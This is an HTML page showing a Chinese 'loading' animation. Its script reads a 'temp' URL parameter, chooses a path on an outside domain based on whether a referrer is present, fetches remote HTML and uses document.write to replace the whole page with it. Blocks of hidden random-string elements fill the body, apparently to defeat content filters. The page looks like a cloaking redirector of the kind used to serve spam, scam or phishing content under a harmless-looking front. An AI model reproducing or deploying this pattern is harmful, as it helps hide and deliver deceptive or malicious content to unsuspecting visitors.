<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .nc15z329o {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .nc15z329o .dkM0tGBP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .nc15z329o .content {
            line-height: 50px;
            text-align: center
        }

        .nc15z329o .img {
            width: 100%
        }

        .nc15z329o .pNbW2O1Q {
            text-align: center
        }

        .nc15z329o .pNbW2O1Q span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .nc15z329o .pNbW2O1Q span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .nc15z329o .pNbW2O1Q span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .nc15z329o .pNbW2O1Q span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .nc15z329o .pNbW2O1Q span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .nc15z329o .pNbW2O1Q span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .nc15z329o .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function qbEoNBkBqkVV(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var NLQiy = qbEoNBkBqkVV('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ NLQiy +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ NLQiy +".html?a=share";
		}
		
        Rt8jxpoxdR=url+"#"+new Date().getTime();
        Rt8jxpoxdR && function() {
            $.get(Rt8jxpoxdR, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >BXyNIGeFDwFcWlt</ul>
<li style='display:none' >wCQuDR3DiWOEey</li>
<span style='display:none'>V7qPjKZrhNAiBeA63Q6hdO5ftey5VSYmlrHNGFdG2hfTWEcjOdG9d9itEsmjjnc9bjr5X</span>
<ul style='display:none' >BXyNIGeFDwFcWlt</ul>
<a  href='#' style='display:none'>pky15rPY5ENWrp4eLLzH3AUxoynEPSfEgSrcWIavspHN47</a>
<b style='display:none' >nMEUft9elONeSC72d7S2f0ceoeH8mq7PdUSZ</b>
<p  style='display:none'>kytDj47ORkTQreeSJ1GSbJBlosPlVSF3qEgNbD45gSikTSx6nhduH8KpmglV41nLvec5VpY4KK5iSaZ</p>
<div style='display:none'>jNbcGqYNHa89Pa5BRU1bAR2PwTkAY8jc0FR5GJlawKwISM6uwlsjAsi5xocd</div>
<img  src='' style='display:none'><div class="nc15z329o">
    <div class="dkM0tGBP">
        <div class="pNbW2O1Q">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >ePGx1ffUg1OEFEJ50muafiDoCcwcoZQscFWPrjyLPO8QRhLfRs7K78c5tFQLySeyIkdL2Chj1FzdWR</h1>
<div style='display:none'>WuqzODR2MQopvN5ZO7zB2IlTtEotvExr064ZWJQrsLja4UBdf6yQo6SeNkfuhJmMkh6XA6cgkqbCkOPx523cCwkyhl5GpJQ</div>
<span style='display:none'>GJ59Rj2vafwI9Fmx9KhvzMeELGa4VHTC2InRGfYeFftOejyQm8UUjkWiI</span>
<img  src='' style='display:none'>
<div style='display:none'>WuqzODR2MQopvN5ZO7zB2IlTtEotvExr064ZWJQrsLja4UBdf6yQo6SeNkfuhJmMkh6XA6cgkqbCkOPx523cCwkyhl5GpJQ</div>
<a  href='#' style='display:none'>WHKtidfGm3PpLB3a4zaBI6hps5iFcPDAEWHSbLRdiUJww8ZXwzJysnUpeDAruf7ivW1AwpxUq0kE8GdHHkvjI479ak2lj</a></body>
</html>